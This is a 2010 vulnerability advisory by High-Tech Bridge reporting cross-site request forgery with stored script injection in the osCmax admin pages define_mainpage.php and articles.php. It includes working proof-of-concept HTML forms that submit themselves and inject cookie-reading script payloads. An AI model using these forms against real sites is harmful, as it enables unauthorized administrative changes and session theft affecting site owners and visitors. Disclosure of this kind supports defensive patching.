Cross-site Request Forgery (CSRF) Vulnerabilities in osCmax

2010-06-07T00:00:00
ID HTB22423
Type htbridge
Reporter High-Tech Bridge
Modified 2010-06-07T00:00:00

Description

High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in osCmax which could be exploited to perform cross-site request forgery attacks.

1) Cross-site request forgery (CSRF) in osCmax
1.1 The vulnerability exists due to insufficient validation of the request origin in admin/define_mainpage.php. A remote attacker can create a specially crafted link, trick a logged-in administrator into following that link and edit mainpage. Due to insufficient sanitation of input data in the "file_contents" parameter it is also possible to store and execute arbitrary HTML and script code in user`s browser in context of vulnerable website.

Exploitation example:
<form action="http://example.com/admin/define_mainpage.php?lngdir=english&filename =mainpage.php&action=sav e" method="post" name="main" >
<input type="hidden" name="file_contents" value='page html content"><script>alert(document.cookie)</script>' />
<input type="hidden" name="x" value="1" />
<input type="hidden" name="y" value="2" />
</form>
<script>
document.main.submit();
</script>
1.2 The vulnerability exists due to insufficient validation of the request origin in admin/articles.php. A remote attacker can create a specially crafted link, trick a logged-in administrator into following that link and modify articles. Due to insufficient sanitation of input data in the "articles_description[] " parameter it is also possible to store and execute arbitrary HTML and script code in user`s browser in context of vulnerable website.
Exploitation example:
<form action="http://example.com/admin/articles.php?tPath=1&aID=1&action=update_ar ticle" method="post" name="main" enctype="multipart/form-data" >
<input type="hidden" name="articles_status" value="1" />
<input type="hidden" name="articles_date_available" value="2010-06-04" />
<input type="hidden" name="authors_id" value="" />
<input type="hidden" name="articles_date_added" value="2010-06-04 00:00:00" />
<input type="hidden" name="x" value="1" />
<input type="hidden" name="y" value="2" />
<input type="hidden" name="articles_name[1]" value="article name" />
<input type="hidden" name="articles_description[1]" value='content"><script>alert(document.cookie)</script>' />
<input type="hidden" name="articles_url[1]" value="" />
<input type="hidden" name="articles_head_title_tag[1]" value="article title" />
<input type="hidden" name="articles_head_desc_tag[1]" value="" />
<input type="hidden" name="articles_head_keywords_tag[1]" value="" />
<input type="hidden" name="articles_name[2]" value="article name" />
<input type="hidden" name="articles_description[2]" value='content"><script>alert(document.cookie)</script>' />
<input type="hidden" name="articles_url[2]" value="" />
<input type="hidden" name="articles_head_title_tag[2]" value="article title" />
<input type="hidden" name="articles_head_desc_tag[2]" value="" />
<input type="hidden" name="articles_head_keywords_tag[2]" value="" />
<input type="hidden" name="articles_name[3]" value="article name" />
<input type="hidden" name="articles_description[3]" value='content"><script>alert(document.cookie)</script>' />
<input type="hidden" name="articles_url[3]" value="" />
<input type="hidden" name="articles_head_title_tag[3]" value="article title" />
<input type="hidden" name="articles_head_desc_tag[3]" value="" />
<input type="hidden" name="articles_head_keywords_tag[3]" value="" />
<input type="hidden" name="x" value="3" />
<input type="hidden" name="y" value="4" />
</form>
<script>
document.main.submit();
</script>